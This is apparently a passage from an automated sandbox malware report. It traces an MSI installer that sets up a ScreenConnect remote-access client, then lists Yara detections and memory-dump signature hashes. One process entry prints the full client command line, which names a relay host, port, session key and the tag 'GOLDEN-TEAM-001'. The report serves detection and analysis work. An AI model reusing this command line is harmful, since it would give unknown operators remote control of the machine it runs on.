                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 247D8C2517E6E69F0B3D03A8794ECC06 C
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                                                    Imagebase:0x1000000
                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:10:23:29
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E58C0E678653AE880B7CA7B7ACABB13E
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:10:23:30
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6B1ED9B9CEA69D2B0631C700B5D80215 E Global\MSI0000
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:10:23:30
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=GOLDEN-TEAM-001"
                                                                                                                                                                    Imagebase:0xc00000
                                                                                                                                                                    File size:95'512 bytes
                                                                                                                                                                    MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:10:23:31
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "e3ab8850-6564-49da-aa7c-f9fea2857c14" "User"
                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                    File size:602'392 bytes
                                                                                                                                                                    MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:10:23:33
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:10:23:34
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "91491e11-89f3-4d65-94f1-b87642885275" "System"
                                                                                                                                                                    Imagebase:0x200000
                                                                                                                                                                    File size:602'392 bytes
                                                                                                                                                                    MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:true

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: #!$K6$7
                                                                                                                                                                      • API String ID: 0-185628103
                                                                                                                                                                      • Opcode ID: 723ac6dba20e3532923c6049ec2921b6684b05393e45179e7b893ad6d5f7f9fe
                                                                                                                                                                      • Instruction ID: 340a24f86cf7717d15dd02aa0b0586764e905708ea9bb7d123fca287554dc8ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 723ac6dba20e3532923c6049ec2921b6684b05393e45179e7b893ad6d5f7f9fe
                                                                                                                                                                      • Instruction Fuzzy Hash: D261A5313002019FC715AB7DD995AAE7BE7EBC5220354822AE515CB385EF74EDDA8B80
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq$Hbq
                                                                                                                                                                      • API String ID: 0-4081012451
                                                                                                                                                                      • Opcode ID: 4161b211a25ed348a67059df12a1a8a10e543c0b38c2fc89680a2a31355cdf32
                                                                                                                                                                      • Instruction ID: c6cfc78ebe0328f479ab555f16436dd0b4f85eb3da9ae5450cb864c8250f8241
                                                                                                                                                                      • Opcode Fuzzy Hash: 4161b211a25ed348a67059df12a1a8a10e543c0b38c2fc89680a2a31355cdf32
                                                                                                                                                                      • Instruction Fuzzy Hash: B441A235B001569BCB04AEADC894AAEBBE2FFC4354F14842AE909DB345DF34DD81CB95
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                      • Opcode ID: 18360eeed28a4ebf7f8929493301c9543e950a55f843ea2abbebfc835cb91e13
                                                                                                                                                                      • Instruction ID: c347dc5f5890499dc19f9c3521a96bbe3cf94abb7fa6141360c83ea72d8df30c
                                                                                                                                                                      • Opcode Fuzzy Hash: 18360eeed28a4ebf7f8929493301c9543e950a55f843ea2abbebfc835cb91e13
                                                                                                                                                                      • Instruction Fuzzy Hash: 6761F574B116059FCB04DF69D9D4AAEB7FAFF8D314B1081A9E506AB365DB30EC058B80
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: {O@q^
                                                                                                                                                                      • API String ID: 0-3366188919
                                                                                                                                                                      • Opcode ID: 02eb33af315e3d9996abda29603ff058a38d76c9d99ddc21ea61b640fc51c03e
                                                                                                                                                                      • Instruction ID: 213931e87e1d9c30ba741ddaba8b384876dc1d0b457664689f34d4015eae5762
                                                                                                                                                                      • Opcode Fuzzy Hash: 02eb33af315e3d9996abda29603ff058a38d76c9d99ddc21ea61b640fc51c03e
                                                                                                                                                                      • Instruction Fuzzy Hash: D231E232344252AFCB01BB7D99A1AEF3BA6DFC5220344812AD0558B356EE74DC8A87D5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: {O@q^
                                                                                                                                                                      • API String ID: 0-3366188919
                                                                                                                                                                      • Opcode ID: f327aba921c9986c6b95939b1b0a06baa9f9170ad880b00df31c4b1879927c23
                                                                                                                                                                      • Instruction ID: acdd3dd3594d83bc70382479a8ab0ab77d525cff4636b9af77b9a2ab6fd5b77b
                                                                                                                                                                      • Opcode Fuzzy Hash: f327aba921c9986c6b95939b1b0a06baa9f9170ad880b00df31c4b1879927c23
                                                                                                                                                                      • Instruction Fuzzy Hash: 1921B031340202AF8B15BA7D99D1AAF76DBEFC42103908129E0268B345EF74ECC687D0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
Memory Dump Source
• Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      • Opcode ID: fe110210905502ca5b5769428a84f3eeef18113636a5d6b0ece633b279afa946
                                                                                                                                                                      • Instruction ID: 2265c3085a7354ea05e18a6ab8e02380c7df9d238855f4cbe2d5a4c0d4d7437a
                                                                                                                                                                      • Opcode Fuzzy Hash: fe110210905502ca5b5769428a84f3eeef18113636a5d6b0ece633b279afa946
                                                                                                                                                                      • Instruction Fuzzy Hash: CD4121306001118FDF18DF29D8D86AA7BB1FF89315B0491A9D811AF3EADB31E956CF91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 66b9449d73a18e3a2846d9abe159a579b069533a0e1b329c87810c16fe3015a0
                                                                                                                                                                      • Instruction ID: 489a91b74adf00326cdf75086db69366e715b3aad93e27b723541ceda36a83bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 66b9449d73a18e3a2846d9abe159a579b069533a0e1b329c87810c16fe3015a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E316E32B0010A8FDB149F69C8986AEFBF6EF89354F144469E506E7395DF71DC408B91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fa24a839ffd9550012c81c9d82d1f6aa52303ea82bf10be7212f29a216bc02fa
                                                                                                                                                                      • Instruction ID: 2065ade2f76b59d84c96617b1ece50cf4660ac68591ecde7ef288c1596a5ea04
                                                                                                                                                                      • Opcode Fuzzy Hash: fa24a839ffd9550012c81c9d82d1f6aa52303ea82bf10be7212f29a216bc02fa
                                                                                                                                                                      • Instruction Fuzzy Hash: BA418B31E10309DFCB05DBB4D944BDDB7B6EF88300F108654E5117B2A4DB75A989CB90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fa69fb39f952b30cd7709f44ecdcb26a02cd7520ba740698dad682226f382915
                                                                                                                                                                      • Instruction ID: 95e4face608e710418817978661a97be226191722e56f2cde8ae8391440d2237
                                                                                                                                                                      • Opcode Fuzzy Hash: fa69fb39f952b30cd7709f44ecdcb26a02cd7520ba740698dad682226f382915
                                                                                                                                                                      • Instruction Fuzzy Hash: A3418F75E012199FDB58DFAAD980AEEBBF2BF88300F14812AE815B7354DB345942CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f2260bd4102420a20adeb446285ac43c851ce7de332d2158043be73d57529110
                                                                                                                                                                      • Instruction ID: 7d062a74cba9bbd217e34e76cf8ba6d92429d8e8c436ce5c4d46f9fb364f805f
                                                                                                                                                                      • Opcode Fuzzy Hash: f2260bd4102420a20adeb446285ac43c851ce7de332d2158043be73d57529110
                                                                                                                                                                      • Instruction Fuzzy Hash: C0310D70A007018FC730DF2AC8986AAB7F1EF89314B148A2DD656DB7A5D730E946CF80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a595f423762baa44d7e9089df570e264c6c7ef8523c262273fcff097b84555cd
                                                                                                                                                                      • Instruction ID: 792aed5d35b6ff7642939a5332300da0e75976b14d49c267a38e84ff0809712d
                                                                                                                                                                      • Opcode Fuzzy Hash: a595f423762baa44d7e9089df570e264c6c7ef8523c262273fcff097b84555cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 83310D706007018FC730DF2AC8846AAB7F1EF89324B144A2DD596DB7A1D731E98ACF90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 46129aaf444803bcdfa3633a34c94876d6d6c54c2525b76761b77ca37526f435
                                                                                                                                                                      • Instruction ID: 19def1bc15112ba1a219926b336f58ea675e98a255f2efca916849ecef9fa68b
                                                                                                                                                                      • Opcode Fuzzy Hash: 46129aaf444803bcdfa3633a34c94876d6d6c54c2525b76761b77ca37526f435
                                                                                                                                                                      • Instruction Fuzzy Hash: 0121D0317042459FCB01EB38D8958EFBBE3EFC521075885AAE5069B366DF30AC068B91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1b1841523449893702ff3918d5041909c789922e5ceca299cb36ecb406d4033a
                                                                                                                                                                      • Instruction ID: b216892eb67712cad59545509d7e7d827a7700bb06d80bea956cf356ae676285
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b1841523449893702ff3918d5041909c789922e5ceca299cb36ecb406d4033a
                                                                                                                                                                      • Instruction Fuzzy Hash: AA2169B06066018FDB24DF29DD847AEBBF5AB88314B044A2DD656D73D4D731E845CB90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0de9445d5ac2168ca61a89155ec021b01c0bae5757ba99766c953d4faaa42e87
                                                                                                                                                                      • Instruction ID: 587925af0da3527e1d4fbe2e929cc82c39b2f7fc19377cf0351829b6eb413c36
                                                                                                                                                                      • Opcode Fuzzy Hash: 0de9445d5ac2168ca61a89155ec021b01c0bae5757ba99766c953d4faaa42e87
                                                                                                                                                                      • Instruction Fuzzy Hash: 75219F30601201DFCF18CF29EDC46DA7B75EF48321F0445A5D916AB2A9DB34D896CBA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4b33b6c3bf57a984eb3fb988e446dbb79b210ba1505705297311dcb008088653
                                                                                                                                                                      • Instruction ID: 20b7fc72c0626635b723955caf123514c9fa405e9be770708cb3867a48d458ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b33b6c3bf57a984eb3fb988e446dbb79b210ba1505705297311dcb008088653
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B214D357002049BCB04EF7DD9C599EFBEAEF85250355847AE809DB356EA30ED448790
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c5e2179349139d74ab50b6a9b850dcb697042b481e390929735d3bbb17c97aa7
                                                                                                                                                                      • Instruction ID: 2e1294480c0d41ef8e9a743790515482a850b84eb5cd94ea498fc3d26feb98c3
                                                                                                                                                                      • Opcode Fuzzy Hash: c5e2179349139d74ab50b6a9b850dcb697042b481e390929735d3bbb17c97aa7
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A214C302007018FC735CF6AD98869ABBB5EF84320B048A29D553976A1DB31E98ACF80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 409aa528e14035c5d4781b041f1fa3493d9824eff7830aef760671e92d0a4502
                                                                                                                                                                      • Instruction ID: 3ec74926c43cca3bd13604bb850bf9207da65fb0cd34b172ff9a6416e31666e3
                                                                                                                                                                      • Opcode Fuzzy Hash: 409aa528e14035c5d4781b041f1fa3493d9824eff7830aef760671e92d0a4502
                                                                                                                                                                      • Instruction Fuzzy Hash: 1211303561021A9BCB55DE9DDCC4FDABBA5EB84728F048529E918CB344D730E990CBA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5be2b215aaa79ba72e326e564e7b41d41efc53429aebbde4d11580dabe4c93c5
                                                                                                                                                                      • Instruction ID: 048c9ccce12864039e839fa725c29c78f571fb72bb72110e1828cd51aa336be3
                                                                                                                                                                      • Opcode Fuzzy Hash: 5be2b215aaa79ba72e326e564e7b41d41efc53429aebbde4d11580dabe4c93c5
                                                                                                                                                                      • Instruction Fuzzy Hash: EE012D326046459BCF06DFEC8CC4ADE7BE5EF8122CF08805AE559CF28AD730C4468750
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726558917.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ebd000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ef153ae93ff465081a4b4e90cf737f3aae2d1ee981ae9ab0d6b7574dea6ac283
                                                                                                                                                                      • Instruction ID: 3201382fa84a46050dddaf3bd7b1ae9f7d5ffe8ab0deb036dbdd23744e09a6ae
                                                                                                                                                                      • Opcode Fuzzy Hash: ef153ae93ff465081a4b4e90cf737f3aae2d1ee981ae9ab0d6b7574dea6ac283
                                                                                                                                                                      • Instruction Fuzzy Hash: 5001406100E3C05ED7138B258C94752BFB4EF53224F1DC5DBD9889F2A3D2695849C772
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726558917.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ebd000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cef8ffe702ca71ea7cd814356dd5b0b6761de440e75e6ca3754d17bb2102d644
                                                                                                                                                                      • Instruction ID: b9cd7a0b751a288a0ce8acb813c4d60a45375f577555985f596d064c91241ae9
                                                                                                                                                                      • Opcode Fuzzy Hash: cef8ffe702ca71ea7cd814356dd5b0b6761de440e75e6ca3754d17bb2102d644
                                                                                                                                                                      • Instruction Fuzzy Hash: 33012B3100C3009AE7115E29CD847E7BF99EF45324F18C429ED086B296D279DC41D6B1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2f9169e1bc569dbea1280d30527cd7b487cecf1e5b028a20c679183d5131ca2e
                                                                                                                                                                      • Instruction ID: a676db4592f06977c6cc81193dfcc08563b471602dc1589e86b3365d010d4ae3
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f9169e1bc569dbea1280d30527cd7b487cecf1e5b028a20c679183d5131ca2e
                                                                                                                                                                      • Instruction Fuzzy Hash: 09012C307402058FDB14CF64C998BAEBBB2EF8A341F109459E802E77A0CB30DD41DB50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
